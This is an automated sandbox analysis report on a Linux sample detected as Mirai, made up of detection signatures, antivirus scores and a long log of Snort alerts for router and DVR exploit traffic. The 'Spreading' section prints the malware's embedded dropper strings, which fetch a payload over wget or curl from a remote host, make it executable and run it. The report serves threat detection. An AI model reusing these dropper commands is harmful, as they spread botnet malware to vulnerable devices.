Analysis Report nT7K5GG5km

Overview

General Information

Sample Name: nT7K5GG5km
Analysis ID: 402069
MD5: eec5c6c219535fba3a0492ea8118b397
SHA1: 292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256: 12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
Infos:

Detection

Mirai
Score: 100
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Yara detected Mirai
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Drops files in suspicious directories
Executes the "iptables" command to insert, remove and/or manipulate rules
Found strings indicative of a multi-platform dropper
Opens /proc/net/* files useful for finding connected devices and routers
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Terminates several processes with shell command 'killall'
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "iptables" command used for managing IP filtering and manipulation
HTTP GET or POST without a user agent
Reads system information from the proc file system
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Sample listens on a socket
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Writes HTML files containing JavaScript to disk
Writes shell script files to disk
Yara signature match

Classification

AV Detection:

barindex
Antivirus / Scanner detection for submitted sample
Source: nT7K5GG5km Avira: detected
Antivirus detection for dropped file
Source: /usr/networks Avira: detection malicious, Label: LINUX/Mirai.lldau
Multi AV Scanner detection for submitted file
Source: nT7K5GG5km Virustotal: Detection: 65% Perma Link
Source: nT7K5GG5km Metadefender: Detection: 51% Perma Link
Source: nT7K5GG5km ReversingLabs: Detection: 68%

Spreading:

barindex
Found strings indicative of a multi-platform dropper
Source: nT7K5GG5km String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: nT7K5GG5km String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: nT7K5GG5km String: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Opens /proc/net/* files useful for finding connected devices and routers
Source: /tmp/nT7K5GG5km (PID: 4623) Opens: /proc/net/route Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4623) Opens: /proc/net/route Jump to behavior

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:58004 -> 185.146.156.163:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:58004 -> 185.146.156.163:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.83.225.155: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 24.115.244.92: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 218.248.113.97: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.93.0.20: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 89.233.76.116: -> 192.168.2.20:
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:55646 -> 94.91.134.122:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:55646 -> 94.91.134.122:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.197.142.165: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.92.49.206: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.188.107.95: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.200.50.12: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 212.219.171.130: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 82.71.24.101: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 212.73.64.16: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.115.11.153: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 74.199.108.177: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 112.30.4.77:29583 -> 192.168.2.20:8080
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.250.123.141: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 223.130.28.80:12685 -> 192.168.2.20:8080
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.207.84.233: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 185.165.138.163: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.175.33.108: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 160.9.43.253: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 88.65.145.128: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 117.254.146.23:1027 -> 192.168.2.20:8080
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 59.99.143.214:12658 -> 192.168.2.20:8080
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 117.194.166.181:34323 -> 192.168.2.20:8080
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 82.83.51.81: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.10.2.50: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 73.39.241.178: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 218.248.173.141: -> 192.168.2.20:
Source: Traffic Snort IDS: 716 INFO TELNET access 182.180.165.26:23 -> 192.168.2.20:39516
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:57484 -> 104.111.81.230:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:57484 -> 104.111.81.230:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.111.81.230:80 -> 192.168.2.20:57484
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 188.1.231.30: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 155.4.82.118: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.2.62.69: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 212.7.29.198: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 50.242.148.249: -> 192.168.2.20:
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:50636 -> 81.196.113.75:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 86.65.65.146: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.159.66.221: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 89.186.146.41: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 88.78.107.232: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 172.16.16.2: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.203.255.9: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 72.35.40.202: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 80.157.131.61: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 80.157.128.213: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 130.236.0.8: -> 192.168.2.20:
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 184.86.117.97:80 -> 192.168.2.20:36288
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.94.183.248: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 93.187.161.54: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 65.144.251.70: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.180.41.173: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.223.233.145: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 118.151.143.192: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.184.161.124: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 192.168.51.205: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.48.247.129: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.213.18.103: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 67.131.254.22: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 82.161.200.6: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.227.175.107: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.196.216.151: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 166.88.241.155: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.62.3.74: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 213.91.166.30: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 208.71.234.42: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 23.230.19.100: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.146.228.186: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.199.155.152: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.85.44.74: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.242.180.69: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 185.233.149.60: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 82.95.159.167: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:40460 -> 112.125.239.197:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:40460 -> 112.125.239.197:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 207.174.245.173: -> 192.168.2.20:
Source: Traffic Snort IDS: 716 INFO TELNET access 182.180.165.26:23 -> 192.168.2.20:40704
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 12.125.79.34: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 156.243.30.45: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.98.47.216: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 104.252.81.170: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 164.82.21.30: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 88.97.57.196: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 37.46.148.51: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.21.227.159: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 66.44.57.192: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.86.81.6: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 85.197.4.212: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.118.110.204: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 218.248.126.117: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.96.210.74: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 218.248.106.133: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 175.45.105.154: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.244.211.255: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 93.51.232.252: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.179.241.64: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.214.192.245: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 85.129.90.38: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.193.95.45: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.33.116.90: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 213.152.110.224: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 64.189.20.4: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 119.225.210.242: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 178.1.99.120: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 178.142.94.93: -> 192.168.2.20:
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 96.88.3.156:23 -> 192.168.2.20:53688
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 96.88.3.156:23 -> 192.168.2.20:53688
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.229.102.211: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.149.162.58: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.249.224.17: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 31.16.47.151: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 207.35.88.172: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 23.27.78.110: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 27.32.160.214: -> 192.168.2.20:
Source: Traffic Snort IDS: 716 INFO TELNET access 182.180.165.26:23 -> 192.168.2.20:41576
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 94.105.99.147: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.222.33.55: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.207.101.92: -> 192.168.2.20:
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 96.88.3.156:23 -> 192.168.2.20:53962
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 96.88.3.156:23 -> 192.168.2.20:53962
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 49.255.62.198: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 146.148.194.79: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.151.248.115: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.212.50.15: -> 192.168.2.20:
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:52540 -> 210.190.146.92:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 49.44.132.19:80 -> 192.168.2.20:37336
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:37336 -> 49.44.132.19:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.254.52.37: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 50.220.200.185: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 71.227.22.112: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 154.85.234.240: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.189.49.186: -> 192.168.2.20:
Source: Traffic Snort IDS: 2024915 ET EXPLOIT Possible Vacron NVR Remote Command Execution 192.168.2.20:50030 -> 104.238.100.85:8080
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:59626 -> 77.182.10.124:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:59626 -> 77.182.10.124:80
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 185.179.24.162: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:57790 -> 147.46.176.166:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:57790 -> 147.46.176.166:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.124.230.135:80 -> 192.168.2.20:54640
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:54640 -> 104.124.230.135:80
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:53902 -> 179.40.62.87:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.45.237.137: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 151.42.41.132: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 41.141.11.172: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 149.11.89.129: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 10.77.0.1: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:40608 -> 3.22.17.236:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:40608 -> 3.22.17.236:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 37.138.176.236: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.137.124.219: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 172.252.214.173: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 10.135.53.254: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.89.220.27: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 84.17.32.179: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:42472 -> 1.34.1.251:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:42472 -> 1.34.1.251:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.225.53.145: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 5.56.18.66: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 158.96.148.68: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 212.238.183.86: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 81.228.88.217: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.175.23.35:46153 -> 192.168.2.20:8080
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:45320 -> 45.148.37.237:80
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 172.247.167.217: -> 192.168.2.20:
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:36288 -> 184.86.117.97:80
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 45.199.65.32: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 195.23.231.85: -> 192.168.2.20:
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:57756 -> 164.132.95.120:8080
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:57756 -> 164.132.95.120:8080
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 60.240.241.20: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.175.127.187:8082 -> 192.168.2.20:8080
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 151.63.180.12: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:59000 -> 46.249.83.253:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:59000 -> 46.249.83.253:80
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 81.228.91.249: -> 192.168.2.20:
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:58488 -> 185.94.99.39:8080
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:58488 -> 185.94.99.39:8080
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:42192 -> 187.146.119.198:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:42192 -> 187.146.119.198:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 222.227.19.134: -> 192.168.2.20:
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:38376 -> 186.153.124.66:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:38376 -> 186.153.124.66:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.236.31.232: -> 192.168.2.20:
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:43254 -> 123.110.194.55:80
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 133.67.251.2: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.190.180.30: -> 192.168.2.20:
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:59308 -> 124.71.40.210:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:59308 -> 124.71.40.210:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 31.17.18.122: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:33820 -> 13.109.201.46:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:33820 -> 13.109.201.46:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:44576 -> 154.210.25.254:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:44576 -> 154.210.25.254:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:54110 -> 114.34.159.229:80
